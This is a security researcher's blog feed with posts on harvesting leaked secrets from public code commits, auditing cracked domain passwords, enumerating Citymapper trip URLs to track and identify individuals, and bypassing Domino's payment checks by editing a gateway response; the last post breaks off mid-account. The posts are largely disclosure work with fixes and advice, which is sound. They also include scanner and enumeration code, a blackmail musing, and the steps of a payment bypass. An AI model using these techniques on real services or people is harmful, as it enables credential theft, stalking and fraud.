darkport urn:uuid:d1f020aa-74a6-4991-8597-97240b3e8729 2018-11-01T18:30:02Z
  • 17 Oct '19 Ahh shhgit!
    ... when you accidentally <code>git commit</code> secrets!
  • Ahh shhgit! 2019-10-17


    <p>DevSecOps — the art of embedding security into the software development lifecycle — is a common and largely underestimated threat vector for many organisations. Software developers can accidentally leak sensitive information, particularly secret keys for third party services, across code hosting platforms such as GitHub, GitLab and BitBucket. These secrets — including the data they were protecting — end up in the hands of bad actors, which ultimately leads to significant data breaches. Much like we saw with the <a target="_blank" href='https://nakedsecurity.sophos.com/2019/08/06/github-encourages-hacking-says-lawsuit-following-capital-one-breach/'>Capital One</a> data breach earlier this year, the Canadian banking giant <a href='https://www.theregister.co.uk/2019/09/18/scotiabank_code_github_leak/'>Scotiabank screw-up</a>, and the <a href='https://www.theregister.co.uk/2017/11/22/uber_2016_data_breach/'>Uber 2016</a> data breach.</p> <p>And finding these secrets across GitHub is nothing new. There are many open-source tools available to help with this depending on which side of the fence you sit. On the adversary side, popular tools such as <a href="https://github.com/michenriksen/gitrob" target="_blank">gitrob</a> and <a href="https://github.com/dxa4481/truffleHog">truffleHog</a> focus on digging into commit history to find secret tokens from specific repositories, users or organisations. <a target="_blank" href='https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04B-3_Meli_paper.pdf'>Recent research</a> from North Carolina State University found that many of the secrets accidentally committed to GitHub are cleaned up within 24 hours, rendering said tools rather ineffective in practice.</p> <p>On the defensive side, Amazon AWS labs have a tool called <a href="https://github.com/awslabs/git-secrets" target="_blank">git-secrets</a> that helps prevent committing secrets in the first place. 
And GitHub themselves are actively scanning for secrets through their <a href='https://help.github.com/en/articles/about-token-scanning'>token scanning</a> project. Their objective is to identify secret tokens within committed code in real-time and notify the provider, who will automatically revoke the token to prevent any abuse. As of 15 October 2019, GitHub have on-boarded 15 providers:</p> <figure><table> <tbody> <tr><td>Alibaba Cloud</td><td>Amazon Web Services (AWS)</td><td>Atlassian</td></tr> <tr><td>Azure</td><td>Discord</td><td>Dropbox</td></tr><tr><td>GitHub</td><td>Google Cloud</td><td>Mailgun</td></tr><tr><td>npm</td><td>Proctorio</td><td>Pulumi</td></tr><tr><td>Slack</td><td>Stripe</td><td>Twilio</td></tr></tbody> </table></figure> <p>So in theory if you accidentally commit AWS secret keys to GitHub, Amazon will be notified and automatically revoke them. But how robust is this process? What if you could do the same but in an adversarial manner? Imagine being able to monitor the entirety of GitHub, GitLab and BitBucket to find any secrets accidentally committed <strong>in real time</strong>. Well, we're in luck. All three platforms provide a public &#39;real time firehose&#39; events API (albeit with a few minutes' delay in practice) that details various activity streams on the site, including code commits.</p> <h2>Introducing shhgit!</h2> <p>Inspired by <a href="https://github.com/michenriksen/gitrob">gitrob</a>, my new tool <strong><a href='https://www.github.com/eth0izzle/shhgit' target="_blank">shhgit</a></strong> will watch this real-time stream and pull out any accidentally committed secrets. It works like this:</p> <p><img alt="image-20190904200221658(1)" src="/assets/img/shhgit-diagram.png"></p> <p>Pre-flight checks can be anything from ensuring the repository is below a particular size to checking it has a certain number of stars or isn&#39;t a fork. 
We then match the filename, path, extension, and the file's contents against <a href='https://github.com/eth0izzle/shhgit/blob/master/config.yaml' target="_blank">120 signatures</a>. How does the tool fare in practice, you ask? Over a period of 48 hours I was able to identify the following secrets:</p> <figure><table> <thead> <tr><th>Secret Type</th><th>Count</th><th>Verified</th><th>Valid (%)</th></tr></thead> <tbody><tr><td>Username and Password in URI</td><td>1,351</td><td>440</td><td>32.5%</td></tr><tr><td>Amazon AWS</td><td>117</td><td>58</td><td>49%</td></tr><tr><td>Google OAuth keys</td><td>231</td><td>174</td><td>75.3%</td></tr><tr><td>MailGun API keys</td><td>194</td><td>87</td><td>44.8%</td></tr><tr><td>Slack Webhook URLs</td><td>139</td><td>62</td><td>44.6%</td></tr><tr><td>SQLite databases</td><td>33</td><td>-*</td><td>-*</td></tr><tr><td colspan="4"><em>-- redacted for brevity</em></td></tr></tbody> </table></figure> <p><em>* indicates no verification took place</em></p> <p>And a fuck-ton of sensitive client data. On average, I was finding and verifying secrets within 7 minutes of them being committed. And as you can see from the verified column, around 50% of them were valid, meaning I could access the respective service using the captured credentials/keys. This suggests that either GitHub&#39;s token scanning isn&#39;t quick enough or their patterns aren&#39;t matching everything. I suspect it&#39;s a bit of both.</p> <p><em>And note: I am purely validating secrets in an immutable way. No data was accessed.</em></p> <p>To bring this threat to life I wrapped up shhgit in a <a href="https://shhgit.darkport.co.uk" target="_blank">web front-end</a>. 
Watching secret after secret scroll across the screen is quite mesmerising!</p> <p><a href="https://shhgit.darkport.co.uk" target="_blank"><img src="/assets/img/shhgit-live-example.png" class="original" /></a></p> <h2>An unexpected finding...</h2> <p>What I wasn&#39;t expecting to find was valid package manager API keys, i.e., npm for Node.js; PyPI for Python; and NuGet for C#. The total number of downloads for these packages is in the <strong>millions</strong>. And the majority of these keys had publishing permissions, meaning a bad actor could theoretically embed malicious code into the packages, re-upload them without detection, and potentially infect millions of devices. These are just some redacted keys for <a href='https://www.nuget.org/' target="_blank">NuGet</a> packages:</p> <p><img alt="shhgit-package-manager-keys" src="/assets/img/shhgit-package-manager-keys.png"></p> <h2>Na na na na Na na na na GITMAN!</h2> <p>If you scroll back up to our table, you&#39;ll note that &quot;Username and Password in URI&quot; is by far the most commonly found type of secret, i.e.: <em>scheme://username:password@hostname:port</em>. And the majority of these are databases, e.g., PostgreSQL, MongoDB, MySQL, etc. Because of the standardised URI format we can easily and automatically verify the credentials for popular schemes:</p> <p><img alt="image-20191015233505462" src="/assets/img/shhgit-uri-code.png"></p> <p>And if the connection is successful — and because we're a Good Samaritan — we can automatically raise an issue with the code maintainers on the platform where the secret was found. 
</p> <figure><table> <tbody><tr><td><img alt="image-20191015234016327" class="original" src="/assets/img/shhgit-issues.png"></td><td style='text-align:left;' ><img alt="image-20191015234317590" class="original" src="/assets/img/shhgit-issue.png"></td></tr></tbody> </table></figure> <h2>So what?</h2> <p>As I mentioned at the beginning of my post, leaking secrets across public code repositories is not a new threat. It's existed since the launch of GitHub and other services over 10 years ago. And from the recent data breaches the implications are clear: reputational damage and huge fines. But we — software developers, team managers, organisations — should be doing more:</p> <ol> <li>Ensure secrets don't end up in your code base in the first place. They should be a part of your environment. At a minimum, config files should be encrypted with an environment-based key. The Travis CI docs have a <a href="https://docs.travis-ci.com/user/best-practices-security/" target="_blank">great guide on this</a>.</li> <li>Use automated tools such as <a href="https://github.com/awslabs/git-secrets" target="_blank">git-secrets</a> to prevent secrets being committed.</li> <li>Provide training — and equally take the initiative to seek out training — on best practices and secure coding standards and guidelines.</li> <li>Make sure you are across your vendors who are developing code or apps for you. Ignorance isn't good enough. Ask the right questions.</li> </ol> <p>And hopefully you won't be exclaiming <strong>ahh shhgit!</strong></p>
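The firehose-plus-signatures approach described in this post is straightforward to sketch. Below is a minimal Python approximation (shhgit itself is written in Go): the two regex signatures are illustrative stand-ins for the 120 shipped in config.yaml, and to stay self-contained the loop only scans commit messages from GitHub's public events API rather than cloning each repository and scanning file paths and contents as a real tool would.

```python
import json
import re
import time
from urllib.request import Request, urlopen

# Illustrative stand-ins for shhgit's 120 YAML-defined signatures.
SIGNATURES = {
    "AWS Access Key ID": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Slack Webhook URL": re.compile(
        r"https://hooks\.slack\.com/services/T\w+/B\w+/\w+"),
}


def scan_text(text):
    """Return (signature_name, matched_secret) pairs found in text."""
    return [(name, match)
            for name, pattern in SIGNATURES.items()
            for match in pattern.findall(text)]


def poll_github_events(token=None):
    """Poll GitHub's public events API -- the 'firehose' -- for pushes."""
    headers = {"Authorization": f"token {token}"} if token else {}
    while True:
        req = Request("https://api.github.com/events", headers=headers)
        with urlopen(req) as resp:
            events = json.load(resp)
        for event in events:
            if event.get("type") == "PushEvent":
                # A real scanner clones the repo here; we only look at
                # commit messages for brevity.
                for commit in event["payload"].get("commits", []):
                    hits = scan_text(commit.get("message", ""))
                    if hits:
                        print(event["repo"]["name"], hits)
        time.sleep(10)  # stay inside the unauthenticated rate limit
```

In practice the events feed lags by a few minutes, which is exactly the window the post's 7-minute median detection time sits inside.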
    Paul Price paul@darkport.co.uk
  • 1 Nov '18 Effortless Password Audits
    Why you should be auditing your users passwords.
  • Effortless Password Audits 2018-11-01


    <p><strong>Passwords</strong>. They are the keys to our digital kingdoms. And these days most organisations will have security controls in place, such as 2 Factor Authentication, to complement the traditional password and help prevent credential stuffing attacks. <em>(sidenote: did you know that 2FA deployed on your Exchange server can be effortlessly bypassed?)</em></p> <p>But that doesn't mean we can relax the rules around passwords. They still play a huge part in protecting our data. According to the <a href="http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/" rel="noopener" target="_blank">Verizon 2017 Data Breach Investigations Report</a>, 81% of hacking-related data breaches involve leveraging stolen and/or weak passwords.</p> <p>And yet I see time and time again organisations enabling "complex" password composition rules and considering the job done. But these rules don't go far enough. Passwords such as <em>Passw0rd</em>, <em>London18</em> and <em>Qwerty123</em> would meet most organisations' complexity requirements, and would be amongst the first attempted in a brute-force attack. When conducting security audits I still regularly see passwords containing the company name or office address, e.g. <em>Acme2018</em> or <em>17StationRoad</em>.</p> <p>This is why you should be auditing your passwords. They can provide invaluable insight into understanding the security awareness levels of your staff. A large number of users with weak and predictable passwords can suggest cultural issues, inadequate training, and even identify staff with low levels of engagement — something you can begin to fix.</p> <h1>Effortless Audits</h1> <p>The cracking process of a password audit is always going to be the largest limiting factor in terms of time. You don't need to crack <strong>all</strong> passwords - just the weak ones - and sometimes cracking on your local machine is sufficient. For larger organisations, it's easy enough to spin up an Amazon AWS GPU instance. 
The <em>p2.16xlarge</em> with 16 GPUs, for example, can work through 130,702 million passwords per second. Even then it can take a few days to crack upwards of 90%.</p> <p>You then need to analyse the passwords and determine if they are <em style="color:green;">good</em> or <em style="color:red;">bad</em>. And who wants to manually analyse thousands of passwords, pick out interesting statistics and create various reports?</p> <p>To make this process less painful, <a href="https://github.com/eth0izzle/cracke-dit" rel="noopener" target="_blank">I have developed a tool called cracke-dit (“Cracked It”)</a> – free and open-source for all – that directly extracts passwords from a Windows Domain Controller, analyses them, and outputs the data in various formats. For example, you can produce a password cloud in seconds:</p> <p><img src="/assets/img/password_cloud.png" alt="Passwords for acme.local\" class="size-big"></p> <p><em>A sample output of cracke-dit can be found at the <a href="#sample-output">bottom of this post</a>.</em></p> <p>Passwords are scored based on complexity using <a href="https://github.com/dropbox/zxcvbn" rel="noopener" target="_blank">Dropbox's zxcvbn</a> algorithm, where 0 is a bad password and 4 is a good password. To get an idea of how unique users' passwords are, they are also checked against <a href="https://haveibeenpwned.com/" rel="noopener" target="_blank">Have I Been Pwned</a>, using <a href="https://blog.cloudflare.com/validating-leaked-passwords-with-k-anonymity/">k-Anonymity</a> to ensure passwords are kept secure.</p> <p>You can then begin to develop training programmes to improve your staff's password hygiene and general security awareness.</p> <h1>Securing Passwords</h1> <p>One of the golden rules I've learned from my programming background is to <strong>never trust user input</strong>. The same applies to passwords and you should plan for them to be compromised at some point. 
Here are 5 things you should be doing: </p> <ol> <li>Ensure wherever a password is used externally, it has adequate security controls in place such as rate limiting and 2 Factor Authentication. Take into account other factors such as login time, geographical location, and IP address, and deny login attempts if they fall outside of the user's usual pattern.</li> <li>Teach your users <strong>what a good password looks like</strong> (hint: a long pass<em>phrase</em>). Why is it important? Show examples of good and bad passwords. Make sure this advice is embedded within your induction programme for new joiners.</li> <li>Gradually increase the minimum password length requirement to at least 10, ideally 12, characters. Longer passwords increase entropy, which means they are (generally) more secure. Consider rolling out a password manager and adequate training to help with this.</li> <li>Audit passwords monthly (or at least quarterly) to identify training needs for users who are still struggling to create strong passwords. Reward staff who are creating better passwords.</li> <li>Stop forcing users to reset their password every X days. Yes, it reduces risk but at <a href="https://www.sans.org/security-awareness-training/blog/why-90-day-rule-password-changing">great cost</a>. Research suggests this leads to users creating weaker passwords over time. 
Only force users to reset passwords if you believe they <a href="https://haveibeenpwned.com/">have been compromised</a>.</li> </ol> <hr id="sample-output"><p class="notification is-link has-text-centered">I've also created a platform called <a href="https://www.passlo.com/" target="_blank" class="has-text-weight-bold">Passlo</a> to fully automate your password audits, enabling you to understand and reduce your risk.</p> <h1>cracke-dit sample output</h1> <p><code style="font-size:14px;">cracke-dit report for acme.local</code></p><code style="font-size:14px;"> <p>Local / Domain users: 4/191<br> Enabled / disabled users: 186/9<br> Computer accounts: 2 1.02%<br> Passwords cracked: 84/197 42.64%<br> Historic passwords: 0 0.00%</p> <p>Password composition<br> Only alphanumeric: 69 35.03%<br> Only digits: 0 0.00%<br> With 'special char': 15 7.61%</p> <table> <tbody><tr> <th colspan="6">Top 10 Passwords (by use, score)</th> </tr> <tr> <th>Password</th> <th>Length</th> <th>Count</th> <th>Score</th> <th>Pwned</th> <th>Users</th> </tr> <tr> <td>Porsche2016</td> <td>11</td> <td>2</td> <td>1</td> <td>1</td> <td>acme.local\alika.reamy, acme.local\charlene.pietro</td> </tr> <tr> <td>Bollocks35</td> <td>10</td> <td>2</td> <td>1</td> <td>0</td> <td>acme.local\eden.theobald, acme.local\tami.priscella</td> </tr> <tr> <td>Amanda175</td> <td>9</td> <td>2</td> <td>0</td> <td>0</td> <td>acme.local\bernelle.farman, acme.local\lanna.menken</td> </tr> <tr> <td>Rasputin2016</td> <td>12</td> <td>1</td> <td>2</td> <td>0</td> <td>acme.local\colline.davon</td> </tr> <tr> <td>Dragoon2016</td> <td>11</td> <td>1</td> <td>2</td> <td>0</td> <td>acme.local\kattie.duff</td> </tr> <tr> <td>Prophet2016</td> <td>11</td> <td>1</td> <td>2</td> <td>0</td> <td>acme.local\sharia.ramey</td> </tr> <tr> <td>Bounce2016</td> <td>10</td> <td>1</td> <td>2</td> <td>0</td> <td>acme.local\lauretta.cyn</td> </tr> <tr> <td>Groove2016</td> <td>10</td> <td>1</td> <td>2</td> <td>2</td> <td>acme.local\shena.fernas</td> </tr> 
<tr> <td>Passwords2016</td> <td>13</td> <td>1</td> <td>1</td> <td>0</td> <td>acme.local\cheslie.codd</td> </tr> <tr> <td>Godzilla2016</td> <td>12</td> <td>1</td> <td>1</td> <td>0</td> <td>acme.local\lenna.mun</td> </tr> </tbody></table> <table> <tbody><tr> <th colspan="6">Top 10 Worst Passwords (by score, length)</th> </tr> <tr> <th>Password</th> <th>Length</th> <th>Count</th> <th>Score</th> <th>Pwned</th> <th>Users</th> </tr> <tr> <td>Admiral!</td> <td>8</td> <td>1</td> <td>0</td> <td>4</td> <td>acme.local\kimberlyn.wilmott</td> </tr> <tr> <td>Beavis24</td> <td>8</td> <td>1</td> <td>0</td> <td>8</td> <td>acme.local\leoine.kristi</td> </tr> <tr> <td>Bigmac44</td> <td>8</td> <td>1</td> <td>0</td> <td>8</td> <td>acme.local\denna.bartel</td> </tr> <tr> <td>Briana48</td> <td>8</td> <td>1</td> <td>0</td> <td>0</td> <td>acme.local\evangelin.adeline</td> </tr> <tr> <td>Casino45</td> <td>8</td> <td>1</td> <td>0</td> <td>13</td> <td>acme.local\beverley.donaldson</td> </tr> <tr> <td>Chipper!</td> <td>8</td> <td>1</td> <td>0</td> <td>3</td> <td>acme.local\janella.popelka</td> </tr> <tr> <td>College!</td> <td>8</td> <td>1</td> <td>0</td> <td>39</td> <td>acme.local\minny.kinghorn</td> </tr> <tr> <td>Connie23!</td> <td>8</td> <td>1</td> <td>0</td> <td>11</td> <td>acme.local\glynda.geller</td> </tr> <tr> <td>Daniel96</td> <td>8</td> <td>1</td> <td>0</td> <td>343</td> <td>acme.local\marlie.maurilla</td> </tr> <tr> <td>Ddddddd6</td> <td>8</td> <td>1</td> <td>0</td> <td>6</td> <td>acme.local\lanita.marte</td> </tr> </tbody></table> </code><p><code style="font-size:14px;">Password length distribution<br> 8: ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ 32 (16.24%)<br> 9: ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ 25 (12.69%)<br> 10: ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ 15 (7.61%)<br> 11: ▇▇▇▇▇▇▇ 7 (3.55%)<br> 12: ▇▇▇▇ 4 (2.03%)<br> 13: ▇ 1 (0.51%)<br> </code></p>
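The k-Anonymity check mentioned above is simple to implement yourself against Have I Been Pwned's Pwned Passwords range API. A sketch in Python (error handling omitted): only the first five hex characters of the SHA-1 hash ever leave your machine; HIBP returns every suffix in that range and the comparison happens locally.

```python
import hashlib
from urllib.request import urlopen


def sha1_parts(password):
    """Split the uppercase SHA-1 hex digest into (prefix, suffix)."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def pwned_count(password):
    """Return how many times a password appears in known breaches.

    Uses HIBP's k-Anonymity model: only the 5-character hash prefix
    is sent over the wire, and the suffix is matched locally.
    """
    prefix, suffix = sha1_parts(password)
    with urlopen(f"https://api.pwnedpasswords.com/range/{prefix}") as resp:
        for line in resp.read().decode("utf-8").splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)
    return 0  # not found in any known breach
```

A non-zero count is a strong signal the password should be banned outright, regardless of how "complex" it looks.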
    Paul Price paul@darkport.co.uk
  • 13 Feb '18 Online Stalking: London, Paris, New York
    Abusing seemingly innocent data.
  • Online Stalking: London, Paris, New York 2018-02-13


    <p><em>Much like the Strava controversy a few weeks ago, this is a great example of how seemingly innocent data can be used for nefarious purposes.</em></p> <p>Citymapper is a journey planning application that integrates all modes of transport (public, cycling, walking, driving) in major urban areas. Starting in London, Citymapper is now available in New York, Paris and Amsterdam as well as further afield (as you’ll see shortly).</p> <p>Citymapper hasn’t disclosed the number of users it has. The Google Play store states between 5 and 10 million downloads; assume the same, if not higher, for Apple’s App Store. Remember that it is only available in major cities and you can see that a large percentage of the world’s capital cities use this application.</p> <p>On a personal note, Citymapper is a ‘must-have’ app for anybody living in London, especially for a non-local. Citymapper’s ability to respond to train non-availability, cancellations and tube strikes whilst still delivering a live and accurate route recommendation has certainly saved a few people caught in the rain or running late for job interviews.</p> <p><strong>So, what kind of data does Citymapper have?</strong></p> <p>On any given day, in cities around the world, they know the exact routes of millions of people; they know where people are travelling, when, and even what modes of transport they are taking.</p> <p>This information would be hugely useful to any organisation that operates in one of the world’s major cities… it could also be used maliciously should any of this data be publicly facing.</p> <p>In October 2015, Citymapper rolled out an update that allowed its users to share routes and arrival times with their friends. Even friends that don’t have the application can view the trip as it all works through the web browser. Each time a trip is planned on Citymapper a URL is generated that allows your friends to view your trip on a web page. 
Below is an example.</p> <p><img src="/assets/img/citymapper_1.jpg" alt=""></p> <p>As you can see there isn’t anything hugely compromising and no personally identifiable information is available. You have a start location, an end location, a route and some timing information. In this instance, a random inhabitant of London travelled from Tooting to Balham on the Northern Line before getting an Overground train to Battersea, all in all taking 26 minutes.</p> <p>The eagle-eyed amongst you might see where this is going.</p> <p>The URL (<a href="https://citymapper.com/trip/Tbs6odu">https://citymapper.com/trip/Tbs6odu</a>) has a fairly short unique identifier: “Tbs6odu”, 7 characters long with uppercase, lowercase and numeric characters.</p> <p>By way of comparison, most online file-sharing services that generate random URLs often have upwards of 20 characters, inclusive of uppercase, lowercase, numbers and special characters (Aj5ye&amp;hsk8Pq@3Hh%#3Q), which is exponentially harder to brute force.</p> <p>Using a Python script to generate alphanumeric codes 7 characters in length and check if they were valid by firing an HTTP request to Citymapper was initially sluggish. Even though it is a comparatively short URL ID there are still ~3 x 10<sup>12</sup> combinations to get through – slow progress if you need to remain below the threshold of Citymapper’s rate limiter. In an hour I had discovered fewer than 10 valid URLs.</p> <p>However, there was a pattern!</p> <ul> <li>T4v8muk</li> <li>Tgg5743</li> <li>Tbiwmq9</li> <li>Tha7v1o</li> <li>Tjrdjfp</li> <li>Tdgv2zj</li> <li>Tjgddh3</li> <li>Twdwck3</li> </ul> <p>Each of the URLs began with a capital ‘T’ and used no uppercase letters after the first character. 
Mathematically, this reduces the number of possible URL combinations from ~3 x 10<sup>12</sup> to ~2 x 10<sup>9</sup>.</p> <p>A few tweaks to the Python script and it was possible to harvest over 35,000 valid URLs in just a few hours.</p> <p>Whilst it was quite fun to browse to each trip individually, and see what the people of the world were up to, I decided to try and visualise all this data. With our list of valid URLs, it was then possible to use API requests to harvest the information available for each of the 35,000 trips.</p> <p>Each API response (broadly!) followed this structure:</p> <pre><code>{'status': 'arrived', 'last_updated': '2016-09-15T10:13:09.126014+00:00', 'region_id': 'uk-london', 'endaddress': '', 'endname': '', 'message': '', 'share_type': 'eta', 'title': None, 'eta': '2016-09-15T10:13:00+00:00', 'startname': '', 'signature': '{"duration": 544, "end": {"address": "Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK", "coords": "51.458745,-0.096573", "id": "google:ChIJhzq09XYEdkgRnJYjDWZtzsA", "name": "Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK", "source": "3"}, "kind": "cycle_personal/fastest", "legs": [{"distance": 1694, "duration": 544, "ec": "51.458573,-0.096713", "mode": "cycle", "sc": "51.468142,-0.095144"}], "region": "uk-london", "start": {"address": "Bessemer Road", "coords": "51.468135,-0.095137", "source": "1"}, "time": "2016-09-15T11:01:44+01:00/NOWISH", "version": 2}', 'startaddress': '', 'coords': [51.458855, -0.096722]} </code></pre> <p>As you can see below it is possible to harvest, en masse, starts and ends to journeys, addresses, methods of transportation and lat/long coordinates.</p> <p>Plotting all the lat/long coordinates generates the following maps.</p> <p>(To any non-GIS aficionados, the easiest way I found to accomplish this was using Google Fusion tables – a tutorial can be found here <a
href="https://support.google.com/fusiontables/answer/2571232">https://support.google.com/fusiontables/answer/2571232</a>).</p> <p>The World:</p> <p><img src="/assets/img/citymapper_2.jpg" alt=""></p> <p>London:</p> <p><img src="/assets/img/citymapper_3.png" alt=""></p> <p>However, not all API returns were created equally. Out of the ~35,000 API returns there were: <strong>1,706 usernames, 3,623 locations that were tagged as ‘home’ and 1,009 locations were tagged as ‘work’</strong>. Combined with some OSINT research we can start to attribute trips to ‘real people’. Take the following API response <em>(anonymised with x’s where appropriate)</em>:</p> <pre><code>{'status': 'expired', 'last_updated': '2017-04-04T19:33:55+00:00', 'region_id': 'uk-london', 'endaddress': '', 'endname': '', 'message': '', 'share_type': 'eta', 'title': None, 'eta': '2017-04-04T20:27:00+00:00', 'startname': '', 'signature': '{"car": 18701, "duration": 3759, "end": {"address": "XXXXX, XXXXX, London E17 XXX, UK", "coords": "51.5XXXX,-0.0XXXXX", "name": "Home", "source": "5"}, "legs": [{"distance": 391, "duration": 346, "ec": "51.4XXXX,-0.1XXXX", "in_station": "0/60", "mode": "walk", "sc": "51.XXXXX,-0.1XXXXX"}, {"end": "Victoria", "mode": "transit", "route_ids": ["NationalRailSN"], "start": "BatterseaPark", "stop_count": 2, "stop_ids": ["Platform_BatterseaPark_NationalRail", "Platform_Victoria_BGeS"]}, {"distance": 0, "duration": 330, "ec": "51.4XXXX,-0.1XXXXX", "in_station": "1/330", "mode": "walk", "sc": "51.4XXXXX,-0.1XXXXX"}, {"end": "WalthamstowCentral", "mode": "transit", "route_ids": ["Victoria"], "start": "Victoria", "stop_count": 12, "stop_ids": ["Platform_Victoria_V_dN", "Platform_WalthamstowCentral_Underground"]}, {"distance": 1349, "duration": 1205, "ec": "51.5XXXXX,-0.0XXXXX", "from_exit": "WalthamstowCentral_E2903", "in_station": "2/120", "mode": "walk", "sc": "51.5XXXX,-0.0XXXXX4"}], "price_pence": 390, "region": "uk-london", "routing_request_id": 
"02ffc71d-daa5-4828-bea3-a31adf3c3c6e", "start": {"coords": "51.4XXXXX,-0.1XXXX", "source": "1"}, "time": "2017-04-04T20:29:04+01:00/NOWISH", "version": 2}', 'startaddress': '', 'coords': [51.4XXXX, -0.1XXXX], 'user_name': 'Chris'} </code></pre> <p>As you can see, on 04 Apr 2017, Chris took a journey at 19:33 from Battersea to his home address in E17. He walked to Victoria station before taking the Victoria line to Walthamstow.</p> <p><img src="/assets/img/citymapper_4.jpg" alt=""></p> <p>With a bit of help from electoral records and social media we can attribute Chris to an actual human being… with actual friends and an actual job.</p> <p><img src="/assets/img/citymapper_5.jpg" alt=""></p> <p>Arguably this journey in isolation isn’t very useful to anybody, malicious or otherwise. If I ran my Python script for a month however, there would probably be enough data to start building a pattern of life for Chris (depending on how often he uses the application). This is especially pertinent as some of the journeys that I harvested were dated from over 2 years ago. However, I couldn’t confirm whether every journey ever made on Citymapper was available with such a small dataset.</p> <p>What is interesting though is that if you take an ‘end location’ and work backwards you can see which individuals have been to certain locations.</p> <p>In my dataset there were 5 instances of journeys planned to visit the Eiffel Tower in Paris; the 5 people had made their way there from shopping, bars, or hotels. Not surprising.</p> <p><img src="/assets/img/citymapper_6.jpg" alt=""></p> <p>But what if we look at somewhere less reputable; such as Amsterdam’s red light district;</p> <p><img src="/assets/img/citymapper_7.png" alt=""></p> <p>We can see that a handful of people may be unaware that their trips are publicly available. 
If we used OSINT to research these trips and people, might we find a happily married man to blackmail?</p> <p>Would Oscar’s employers be happy to know that he was taking a trip home at 04:03 on a Wednesday morning?</p> <p><img src="/assets/img/citymapper_8.jpg" alt=""></p> <h2 id="thefix">The Fix</h2> <p>I wouldn’t classify this as a bug or a security flaw, per se, but there is more Citymapper can do to prevent these types of attacks from being used in the wild:</p> <ol> <li>To protect future URLs, increase the ID complexity either by increasing the length or including uppercase and special characters. </li> <li>Audit your historical trips and remove the links to trips over a few days old; there is no reason for a link to remain after a trip is complete. </li> <li>Remove first names or home labels from the publicly facing API.</li> </ol> <h2 id="disclosure">Disclosure</h2> <p>We e-mailed Citymapper’s operations team to raise the issue and their engineering team promptly responded and fixed the issue within a week – thank you Citymapper!</p> <ul> <li>7th November ’17 — Research conducted</li> <li>9th November ’17 — Vendor notified</li> <li>16th November ’17 — Citymapper pushes out a patch, rendering this attack infeasible — seeking solutions to existing URLs and confidentiality issues.</li> <li>13th February ’18 — Article published</li> </ul>
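For the curious, the keyspace reduction and candidate generation described in this post can be sketched in a few lines of Python. The checker is illustrative only (Citymapper patched the endpoint in November 2017, so it no longer behaves this way), and treats any HTTP error as an invalid ID:

```python
import random
import string
from urllib.error import HTTPError
from urllib.request import urlopen

# Observed pattern: a capital 'T' followed by six lowercase/digit chars.
ALPHABET = string.ascii_lowercase + string.digits

FULL_KEYSPACE = 62 ** 7     # 7 chars of upper+lower+digits: ~3.5 x 10^12
PATTERN_KEYSPACE = 36 ** 6  # 'T' fixed, 6 free positions:   ~2.2 x 10^9


def random_trip_id():
    """Generate one candidate trip ID matching the observed pattern."""
    return "T" + "".join(random.choice(ALPHABET) for _ in range(6))


def trip_exists(trip_id):
    """Illustrative check only -- the endpoint has since been patched."""
    try:
        with urlopen(f"https://citymapper.com/trip/{trip_id}") as resp:
            return resp.status == 200
    except HTTPError:
        return False
```

Fixing the first character cuts the search space by three orders of magnitude, which is the whole reason enumeration became feasible under a rate limiter.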
    Daniel Faram paul@darkport.co.uk
  • 4 Apr '16 Domino's: Pizza and Payments
    pizza.free = true
  • Domino's: Pizza and Payments 2016-04-04
    <p class="notification is-darker"><strong>Note</strong>: Domino's have since resolved the issue and is one of the reasons why I've decided to post this article. Payments are still being processed client side but they now have the proper server side checks in place.</p><p>Friday evening, circa 3 years ago. I'm craving an Americano with extra pineapple and hot dog stuffed crust. I fire up the Domino's Android app, place my order and 40 minutes later I'm stuffing my face with 13.5" goodness.</p> <p>I've ordered enough pizza to know that at the end of the order process you sometimes, seemingly randomly, get a £10 off voucher code for your next order. Naturally, I was intrigued to how this was generated.</p> <p>After sifting through the apps source code I notice that the code is generated server side via an API call. I fire up a proxy (Burp) to monitor the web traffic between my phone and the Domino's API server and run through the order process. Something immediately catches my eye...</p> <p><strong>The Domino's app <em>itself</em> was processing payments client side via a payment gateway.</strong></p> <p>This isn't inherently bad if it has been correctly implemented with the appropriate server side checks. Usually payments would be processed server side so that the process is hidden and out of the hands of meddling users.</p> <p>So let's take a closer look. 
I place a new order with the VISA debit card test number (<em>4111111111111111</em>) which returns the following response from DataCash (the payment gateway):</p> <pre><code>&lt;Response&gt; &lt;CardTxn&gt; &lt;authcode&gt;NOT AUTHORISED&lt;/authcode&gt; &lt;card_scheme&gt;VISA&lt;/card_scheme&gt; &lt;/CardTxn&gt; &lt;datacash_reference&gt;3340105259009953&lt;/datacash_reference&gt; &lt;merchantreference&gt;3340105259009953&lt;/merchantreference&gt; &lt;mode&gt;LIVE&lt;/mode&gt; &lt;reason&gt;DECLINED&lt;/reason&gt; &lt;status&gt;7&lt;/status&gt; &lt;time&gt;1449024000&lt;/time&gt; &lt;/Response&gt; </code></pre> <p>As expected the card is declined and the App shows an error message. Let's try our luck by intercepting the response and changing some values around. I start a new order and set breakpoints on the HTTP endpoint for the DataCash API. Once the breakpoint triggers on the response, I change the <code>&lt;reason&gt;</code> element value to <em>ACCEPTED</em> and <code>&lt;status&gt;</code> to <em>1</em> (which means transaction accepted according to the <a href="https://testserver.datacash.com/software/download.cgi">DataCash documentation</a>).</p> <p><img src="/assets/img/dominos_1.png" alt="Order Placed"></p> <p><strong>Errr, what?</strong> It looks like my order was placed without a valid payment. Surely this is an oversight/edge case and Domino's will have back office checks in place before physically starting to prepare my order... right?</p> <p>A few minutes pass and the Pizza Tracker changes from "Order" to "Prep" and then to "Baking". I couldn't bear to wait another 30 minutes to see if an Americano pizza, Chicken Strippers and Chocolate Chip Cookie + Ice Cream side turn up at my door. I call the store and they confirm they have received my order and it will be delivered within the next 20 minutes. My first thought: <strong>awesome</strong>. 
